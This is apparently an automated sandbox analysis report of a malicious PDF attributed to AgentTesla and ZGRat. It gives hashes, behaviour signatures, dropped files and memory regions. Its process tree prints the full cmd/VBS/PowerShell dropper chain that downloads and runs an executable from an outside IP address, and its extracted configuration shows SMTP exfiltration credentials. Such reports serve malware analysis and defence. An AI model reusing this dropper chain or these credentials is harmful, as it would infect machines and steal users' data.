Analysis

  • max time kernel
    118s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    12-12-2023 10:52

General

  • Target

    IMG_008542100.pdf

  • Size

    1.3MB

  • MD5

    2f1d6b1a0ba37b4a5b7a62de21886b18

  • SHA1

    f0d8b39999e566f5177dfcfb73843a35f62e0100

  • SHA256

    ca28f4b4337e38b1d178853fc72012895eaee002bec90d907b177623eed6967c

  • SHA512

    636b628e22f7ae1c3ca2f2e7323dc0a4787ae8108ed650594d1bdf0d7b3244ac6c3ce4254e5fc24414b30f3821ee5d8dc831d3f2032561221b27b71fc30501ea

  • SSDEEP

    24:WbKZ7EjswTw+Lwky3lD6E5wkMMJIWgIXG2CSYapAakwOerXQr/3SlJiNno2fuxk2:tmswTwGwkyV1wkMYXG2lNkmXQbOiN0J

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.233.57.103/hih/lew.exe

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    server1.sqsendy.shop
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    &qZV17u[D~36

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\IMG_008542100.pdf"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('http://62.233.57.103/hih/lew.exe', 'lew.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start lew.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs PDF Encrypted. Please click
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\encrypted.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2792
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c msd89h2j389uh.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2680
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "(New-Object Net.WebClient).DownloadFile('http://62.233.57.103/hih/lew.exe', 'lew.exe')"
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2968
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 5
            5⤵
            • Delays execution with timeout.exe
            PID:1480
          • C:\Users\Admin\AppData\Local\Temp\lew.exe
            lew.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2628
            • C:\Users\Admin\AppData\Local\Temp\lew.exe
              C:\Users\Admin\AppData\Local\Temp\lew.exe
              6⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2740

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\TarF58D.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Local\Temp\encrypted.vbs

    Filesize

    134B

    MD5

    14e687ecf432ecd2c615f7f62d283f05

    SHA1

    abae5599f47fd22772927406f763350de7409c4f

    SHA256

    7d3ea68637f7cdad5fed91e8b364ed35fe46ff79d2e79f386c8eaf502570b51c

    SHA512

    a5e3a3ec87caed4f5bf99b486abfa74fb00149534fdef8923bc8a14f349808ca00aee1c5dfd33ad4f4177d7fbdfb5bbaf83daaa68b28fb946e930966ef9c7a96

  • C:\Users\Admin\AppData\Local\Temp\lew.exe

    Filesize

    34KB

    MD5

    ca0f3fee83088ec1f2c80ae0d5019737

    SHA1

    d893377e3a558a785f547e3b4de6b99281e2b90e

    SHA256

    7a189d9108184f0016e25c54c3f46f832669abd08c4c9bda427ef75614522f64

    SHA512

    7c77a5e549cacb14900ea92367259f5a5fba96539ea026186f7965892ebdf2bc1945bbf99bdcb99a4c3fd71949f6b554f303c28782fd09414309eea4309a2185

  • C:\Users\Admin\AppData\Local\Temp\msd89h2j389uh.bat

    Filesize

    145B

    MD5

    bb82c259d8ee97aa3f1d4e630566bee2

    SHA1

    a0bb0a96c5bf08464055f389e4feb33f44539edc

    SHA256

    0272d568f63ce59dbf3515341d4427f249dc9da30bb46ed26d06823b93233925

    SHA512

    fd16bae59a85ddc16dd38317d30ad0dd9fd1b3636dea5331ea0c7b02fa2d6c3ecdbecf240dd8883f0c73e20ddf51033e85d2c0a3bee2b568a29302658a18053b

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

    Filesize

    3KB

    MD5

    fe3c6a9bda0cd3fd992867d325451a09

    SHA1

    1132832c7d7e72b34f4ecc3557b4d78959d389fc

    SHA256

    b6179a327c5cea2afb551522e18cdfd077c8f5ecced5b31f762f5169fd6fc793

    SHA512

    d14f7d9c621258bb28042300d2ec1589c5210808d6978413c581773c82ca92f43c12eeb436f3030cab272eb6dbd40406f11955dd9928e467fe01333cee7c77b3

  • memory/2628-116-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-78-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-72-0x0000000005350000-0x00000000053FA000-memory.dmp

    Filesize

    680KB

  • memory/2628-73-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-74-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-76-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-118-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-80-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-82-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-84-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-86-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-88-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-90-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-92-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-94-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-96-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-98-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-100-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-122-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-104-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-108-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-110-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-71-0x0000000004B40000-0x0000000004B80000-memory.dmp

    Filesize

    256KB

  • memory/2628-120-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-102-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-114-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-70-0x00000000717A0000-0x0000000071E8E000-memory.dmp

    Filesize

    6.9MB

  • memory/2628-112-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-106-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-126-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-124-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-128-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-130-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-132-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-134-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-136-0x0000000005350000-0x00000000053F3000-memory.dmp

    Filesize

    652KB

  • memory/2628-995-0x0000000000490000-0x0000000000491000-memory.dmp

    Filesize

    4KB

  • memory/2628-997-0x0000000004C80000-0x0000000004CCC000-memory.dmp

    Filesize

    304KB

  • memory/2628-996-0x0000000004230000-0x0000000004272000-memory.dmp

    Filesize

    264KB

  • memory/2628-1009-0x00000000717A0000-0x0000000071E8E000-memory.dmp

    Filesize

    6.9MB

  • memory/2628-69-0x0000000000080000-0x000000000008C000-memory.dmp

    Filesize

    48KB

  • memory/2740-1014-0x0000000071820000-0x0000000071F0E000-memory.dmp

    Filesize

    6.9MB

  • memory/2740-1015-0x0000000004980000-0x00000000049C0000-memory.dmp

    Filesize

    256KB

  • memory/2740-1013-0x0000000000400000-0x0000000000444000-memory.dmp

    Filesize

    272KB

  • memory/2740-1053-0x0000000071820000-0x0000000071F0E000-memory.dmp

    Filesize

    6.9MB

  • memory/2740-1054-0x0000000004980000-0x00000000049C0000-memory.dmp

    Filesize

    256KB

  • memory/2968-46-0x0000000002680000-0x00000000026C0000-memory.dmp

    Filesize

    256KB

  • memory/2968-44-0x00000000714D0000-0x0000000071A7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2968-45-0x0000000002680000-0x00000000026C0000-memory.dmp

    Filesize

    256KB

  • memory/2968-43-0x00000000714D0000-0x0000000071A7B000-memory.dmp

    Filesize

    5.7MB

  • memory/2968-65-0x00000000714D0000-0x0000000071A7B000-memory.dmp

    Filesize

    5.7MB